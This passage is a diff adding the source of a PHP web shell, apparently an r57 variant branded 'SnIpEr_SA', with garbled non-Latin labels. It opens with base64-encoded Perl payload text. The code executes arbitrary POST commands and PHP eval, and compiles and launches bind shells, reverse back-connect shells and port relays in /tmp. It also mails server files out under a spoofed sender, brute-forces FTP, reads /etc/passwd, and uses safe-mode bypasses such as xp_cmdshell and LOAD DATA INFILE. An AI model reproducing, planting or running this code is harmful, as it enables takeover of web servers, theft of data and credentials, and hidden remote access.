+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+if($unix)
+ {
+ if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
+ if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
+ if($safe_mode) { $sysctl = '-'; }
+ else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
+ else
+  {
+   $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
+   if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
+   if(empty($sysctl)) { $sysctl = '-'; }
+   setcookie('sysctl',$sysctl);
+  }
+ }
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "<img src=\"http://127.0.0.1/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
+@readfile ("http://127.0.0.1/r57shell_version/version.php?version=".$current_version."");}}
+echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#CCCCCC><tr><td bgcolor=#000000 width=160><font face=Comic Sans MS size=4>'.ws(2).'<font face=Wingdings size=6><b>N</b></font><b>'.ws(2).'SnIpEr_SA </b></font></td><td bgcolor=#000000><font face=tahoma size=1>';
+echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+if($unix)
+ {
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb;
+ }
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2)."ÇáæÖÚ ÇáÇãä: <b>";
+echo (($safe_mode)?("<font color=#008000>ÝÚÇá</font>"):("<font color=red>ÛíÑ ÝÚÇá</font>"));
+echo "</b>".ws(2);
+echo "ÇÕÏÇÑ ÇáÈí ÇÊÔ Èí: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "ÇáßíÑá: <b>".(($curl_on)?("<font color=#008000>ÝÚÇá</font>"):("<font color=red>ÛíÑ ÝÚÇá</font>"));
+echo "</b>".ws(2);
+echo "ãÇí Óßá: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=#008000>ÝÚÇá</font>"; } else { echo "<font color=red>ÛíÑ ÝÚÇá</font>"; }
+echo "</b>".ws(2);
+echo "Çã ÇÓ Óßá: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=#008000>ÝÚÇá</font>";}else{echo "<font color=red>ÛíÑ ÝÚÇá</font>";}
+echo "</b>".ws(2);
+echo "ÈæÓÊ ÞÑí Óßá: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=#008000>ÝÚÇá</font>";}else{echo "<font color=red>ÛíÑ ÝÚÇá</font>";}
+echo "</b>".ws(2);
+echo "ÇæÑÇßá: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=#008000>ÝÚÇá</font>";}else{echo "<font color=red>ãÛáÞ</font>";}
+echo "</b><br>".ws(2);
+echo "ÇáÏæÇá ÇáããäæÚÉ : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=#00800F>áÇíæÌÏ</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+echo "<br>".ws(2)."ÇáãÓÇÍÉ ÇáÎÇáíå : <b>".view_size($free)."</b> ÇáãÓÇÍÉ ÇáßáíÉ: <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9>
+<tr><td align=right width=100>';
+echo $font;
+if($unix){
+echo '<font color=#CCCCCC><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=tahoma size=-2 color=#2279D9><b>";
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+if(!empty($id)) { echo ws(3).$id."<br>"; }
+else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
+ {
+ $euserinfo  = @posix_getpwuid(@posix_geteuid());
+ $egroupinfo = @posix_getgrgid(@posix_getegid());
+ echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
+ }
+else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
+echo ws(3).$dir;
+echo ws(3).'( '.perms(@fileperms($dir)).' )';
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=tahoma size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@getenv("USERNAME")."<br>";
+echo ws(3).$dir;
+echo "<br></font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
+ {
+ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
+ err(6+$res);
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
+ {
+ if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
+ else
+  {
+    $filename = @basename($_POST['loc_file']);
+    $filedump = @fread($file,@filesize($_POST['loc_file']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    $attach = array(
+                    "name"=>$filename,
+                    "type"=>$mime_type,
+                    "content"=>$filedump
+                   );
+    if(empty($_POST['subj'])) { $_POST['subj'] = 'file from SnIpEr_SA shell'; }
+    if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
+    $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
+    err(6+$res);
+    $_POST['cmd']="";
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ $mtime = @filemtime($_POST['e_name']);
+ if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
+ else {
+ if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
+ @fwrite($file,$_POST['e_text']);
+ @touch($_POST['e_name'],$mtime,$mtime);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ if(!$connection) { err(3); }
+ else
+  {
+  if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
+  else
+   {
+   if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);        }
+   if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);        }
+   }
+  }
+ @ftp_close($connection);
+ $_POST['cmd'] = "";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ if(!$connection) { err(3); $_POST['cmd'] = ""; }
+ else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
+ @ftp_close($connection);
+ }
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if(!$unix){
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     @mysql_query("DROP TABLE IF EXISTS temp_SnIpEr_SA_table");
+     @mysql_query("CREATE TABLE `temp_SnIpEr_SA_table` ( `file` LONGBLOB NOT NULL )");
+     @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
+     $r = @mysql_query("SELECT * FROM temp_SnIpEr_SA_table");
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     @mysql_query("DROP TABLE IF EXISTS temp_SnIpEr_SA_table");
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table SnIpEr_SA_temp_table",$db);
+     @mssql_query("create table SnIpEr_SA_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into SnIpEr_SA_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from SnIpEr_SA_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }
+    @mssql_query("drop table SnIpEr_SA_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'test5':
+  if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
+  $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
+  @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
+  $lines = file ('/tmp/mb_send_mail');
+  foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
+  break;
+  case 'test6':
+  $stream = @imap_open('/etc/passwd', "", "");
+  $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
+  for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
+  @imap_close($stream);
+  break;
+  case 'test7':
+  $stream = @imap_open($_POST['test7_file'], "", "");
+  $str = @imap_body($stream, 1);
+  echo $str;
+  @imap_close($stream);
+  break;
+  case 'test8':
+  if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
+  else echo $lang[$language.'_text119'];
+  break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
+ $cmd_rep = ex($_POST['cmd']);
+ if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="ftp_brute")
+ {
+ $suc = 0;
+ foreach($users as $user)
+  {
+  $connection = @ftp_connect($ftp_server,$ftp_port,10);
+  if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
+  else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
+  @ftp_close($connection);
+  }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse'])) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  $sql = new my_sql();
+  $sql->db   = $_POST['db'];
+  $sql->host = $_POST['db_server'];
+  $sql->port = $_POST['db_port'];
+  $sql->user = $_POST['mysql_l'];
+  $sql->pass = $_POST['mysql_p'];
+  $sql->base = $_POST['mysql_db'];
+  if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
+  else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
+  else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
+  else {
+   if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
+   else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
+   else { echo "[-] ERROR! Can't write in dump file"; }
+   }
+ }
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+function div_title($title, $id)
+{
+  return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
+}
+function div($id)
+ {
+ if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
+ return '<div id="'.$id.'">';
+ }
+if(!$safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','snn',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text302'].$arrow."</b>",in('text','SnIpEr_SA',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode){
+$aliases2 = '';
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
